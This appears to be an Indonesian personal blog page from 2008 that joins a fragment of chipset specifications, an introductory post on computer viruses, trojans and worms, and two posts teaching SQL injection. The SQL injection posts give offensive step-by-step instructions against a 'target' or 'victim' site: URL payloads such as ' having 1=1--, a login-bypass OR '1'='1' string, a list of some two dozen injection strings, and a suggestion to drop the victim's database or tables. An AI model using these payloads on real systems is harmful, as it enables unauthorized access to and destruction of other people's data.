- mendukung external APIC interface for symmetrical multiprocessor configurations
- USB v.1.0 and Intel Universal HCI v.1.1 compatible Microsoft WindowsTM 95and plug and play BIOS compliant
- Supports ATAPI compliant devices including DVD devices
- USB Controller, UltraDMA-33 master mode and EIDE controller

VIA and S3

Produksi chipset antara S3 dan VIA, dengan nama SavageNB, akan mengkombinasikan S3's Savage4 graphics engine dengan VIA's Apollo Pro core logic design.
Dengan mengintegrasikan 2 teknologi ini akan mengefektifitaskan kombinasi 3 komponen (North Bridge, the graphics controller and frame buffer) ke dalam 1 konfigurasi chip

5 chip sets Intel untuk 100 MHz RAM

Name of chipset 82440BX 82440GX 82450NX Basic 82450NX Full 82440ZX


01 April 2008

apa itu Virus Komputer bagian 1: mengenal

Apa sich virus?

Virus atau worm adalah suatu program komputer yang dapat menyebar pada komputer atau jaringan dengan cara membuat copy dari dirinya sendiri tanpa sepengetahuan dari pengguna komputer tersebut. Virus dapat menimbulkan efek yang berbahaya, misalnya menampilkan pesan pada komputer, mencuri data atau bahkan mengontrol komputer Anda dari jarak jauh.

Bagaimana cara virus bekerja?
virus harus dijalankan dahulu sebelum ia mampu untuk menginfeksi suatu komputer. Ada banyak cara agar virus ini dijalankan oleh si korban, misalnya dengan menempelkan dirinya pada suatu program yang lain. Ada juga virus yang jalan ketika Anda membuka suatu tipe file tertentu. Kadangkala virus juga memanfaatkan lubang pada keamanan yang ada dalam komputer(baik sistem operasi atau aplikasi), dengan memanfaatkan hal-hal tersebut virus dapat berjalan dan kemudian akan menyebarkan dirinya sendiri secara otomatis.

sobat blogger juga dapat menerima suatu file yang sudah terinfeksi virus dalam attachment e-mail Anda. Begitu file tersebut Anda jalankan, maka kode virus akan berjalan dan mulai menginfeksi komputer Anda dan bisa menyebar pula ke semua file yang ada di jaringan komputer Anda.

apa itu Trojan horse ?

Trojan horse adalah program yang kelihatan seperti program yang valid atau normal, tetapi sebenarnya program tersebut membawa suatu kode dengan fungsi-fungsi yang sangat berbahaya bagi komputer Anda.

Sebagai contoh,virus Xombe atau Dloader-L datang dari attachment e-mail seolah-olah berasal dari windowsupdate@microsoft.com dan menginstalasi dirinya di komputer korban ketika pengguna membuka attachment.

Begitu terinstal, Xombe akan terhubung ke sebuah situs, kemudian mendownload dan menginstal program lain, bernama Mssvc-A. Program ini memaksa komputer korban untuk mendistribusikan serangan berupa denial of service atau DoS. Serangan tersebut ditujukan ke situs-situs web.

Trojan tidak dapat menyebar secepat virus karena trojan tidak membuat copy dari dirinya sendiri secara otomatis. Tapi sejalan dengan perkembangan virus, maka trojan horse bisa bekerjasama dengan virus dalam hal penyebarannya. Virus dapat melakukan download terhadap trojan yang merekam keystroke keyboard Anda atau mencuri informasi yang ada pada komputer Anda. Di sisi lain, trojan juga digunakan untuk menginfeksi suatu komputer dengan virus.

Worms

Worm bisa dikatakan mirip dengan virus tetapi worm tidak memerlukan carrier dalam hal ini program atau suatu dokumen. Worm mampu membuat copy dari dirinya sendiri dan mengunakan jaringan komunikasi antar komputer untuk menyebarkan dirinya. Banyak virus seperti MyDoom atau Bagle bekerja sebagaimana layaknya worm dan menggunakan e-mail untuk mem-forward dirinya sendiri kepada pihak lain.

Apa efek yang ditimbulkan oleh virus?

Virus seringkali mengganggu atau menghentikan kerja komputer sobat blogger pada saat diperlukan. Sejalan dengan perkembangan di dunia virus komputer maka sampai saat ini efek dari virus ini sudah semakin banyak, yaitu:



  • Memperlambat e-mail
    Virus dapat menyebar melalui e-mail, seperti virus Sobig, dan mampu untuk membuat trafik e-mail yang sangat besar yang tentu saja akan membuat server menjadi lambat atau bahkan menjadi crash. Bahkan jika hal tersebut tidak sampai terjadi, perusahaan yang merasa terganggu dengan insiden ini toh juga akan mematikan servernya.

  • Mencuri data
    konfidental Worm Bugbear-D contohnya, mampu merekam keystroke keyboard Anda, termasuk password dan lain sebagainya. Rekaman tadi biasanya akan dikirim ke si pembuat virus untuk dimanfaatkan lebih lanjut.

  • Menghapus data
    Virus Sircam contohnya, berusaha untuk menghapus atau meng-overwrite hardisk Anda pada suatu waktu tertentu yang tidak terduga.

  • Men-disable hardware
    Virus CIH atau Chernobyl contohnya, berusaha untuk meng-overwrite chip BIOS pada tanggal 26 April dan akan membuat komputer Anda menjadi tidak berfungsi.


nah sekarang kan kita udah tau apa sich itu virus dan worm tinggal bagaimana mengetahui resikonya dech, nantikan postingan berikutnya yach.

sql injection bagian II

kemarin sudah saya bahas bagaimana melakukan injection dalam input box. nach sekarang saya aka menaggapin akan komentar yang dilontarakan oleh noviana, bagaimana menggunakan sql injection based url.

sebenarnya teknik injection url ini sama dengan injection input box tapi bedanya kita menuliskan string sql nya pada url si target.

misalnya :www.target.com/moreinfo.cfm?ProductID=245

Nah, ketikkan string injeksi SQL tadi ke address bar anda dibelakang url target itu, contohnya:

www.target.com/moreinfo.cfm?ProductID=245' having 1=1--
atau
www.target.com/moreinfo.cfm?ProductID=245' having 1=1--

nah jika berhasil akan ada tampilan error page dari situs itu yang memberi informasi tentang struktur database situs itu. Dari hasil informasi yang kita dapat ini, kita dapat melakukan serangan berikutnya.

Apabila browser kita adalah Internet Explorer, ada sebagian situs yang tidak menampilkan error-nya, ini dikarenakan opsi Show Friendly HTTP Error Messages diaktifkan. Untuk itu kita perlu menonaktifkannya dengan cara menghilangkan tanda centang di kotaknya.

Opsi ini dapat anda temukan di Tools > Internet Option > Advanced cari opsinya di bagian Browsing lalu hilangkan tanda centangnya dan klik tombol Apply.





Sesudah itu apabila anda menemui error page yang berisi HTTP 500 error - internal server error- sebelum men-set opsi tadi, anda cukup menekan tombol Refresh, lalu terlihatlah sudah error-nya. Setelah kita tahu struktur database-nya, dengan pengetahuan dasar dari belajar SQL kita dapat menghancurkan database itu dengan perintah ' drop database [nama_database] atau drop table [nama_table]. :>

Ada banyak variasi dari injection string yg dapat digunakan untuk melakukan SQL Injection :
’or 1=1–
’or 0=0 –
’or ’x’=’x
’or a=a-
“or 0=0 –
“or 0=0 #
“or “x”=”x
“)or(”a”=”a
admin’–
hi” or 1=1 –
hi’ or’a’=’a
hi”)or(”a”=”a
or 0=0 #
’or a=a–
’or 0=0 #
’having 1=1–
“or 1=1–
“or “a”=”a
’)or(’a’=’a
’)or(’x’=’x
hi” or “a”=”a
hi’ or 1=1 –
hi’)or(’a’=’a
or 0=0 –
or 1=1–
Serangan dgn menggunakan SQL Injection dapat lebih bervariasi lagi dan itu tergantung kepada situasi dan tujuan dari serangan yg dilakukan oleh penyerang.

mungkin ini bisa membantu anda yang ingin tahu apa itu sql injection, mungkin kalo ada kekurangan anda bisa tanya pada om google aja ok. ^_^

sumber: http://students.ee.itb.ac.id/~htamici/drupal/?q=node/4

19 March 2008

SQL Injection

mungkin para sobat blogger pernah dengar dengan namanya SQl Injection, yupz teknik ini biasa digunakan oleh para pembajak untuk memasuki suatu halaman web.

ada beberapa langkah untuk menggunakan teknik ini.

pertama kita tentukan dulu celah yang bisa kita inject dengan cara bejalan-jalanlah terlebih dahulu didalam web si calon korban, kalau beruntung Kita akan menemukan 2 model cara input parameter, yaitu dengan cara memasukkan lewat input box atau memasukkannya lewat alamat URL.

disini kita kan bahas dengan menggunakan metode yang paliing mudah dulu yaitu dengan cara input box, didalam kotak input atau dalam kotak login kita tuliskan :]

SELECT * FROM nama_tabel WHERE nama_field = 'anything' OR '1'='1';fungsi dari OR '1'='1'; adalah memaksakan masuk kedalam page admin korban karena kita kan gan tau user name dan passwordnya. kalo berhasil masuk nanti akan ada tampilan welcome yang ada dalam page.

sebenarnya sich masih banyak teknik dalam meggunakan sql injection ini,mungkin dilain post dech mudah -mudahan teknik ini berhasil yach.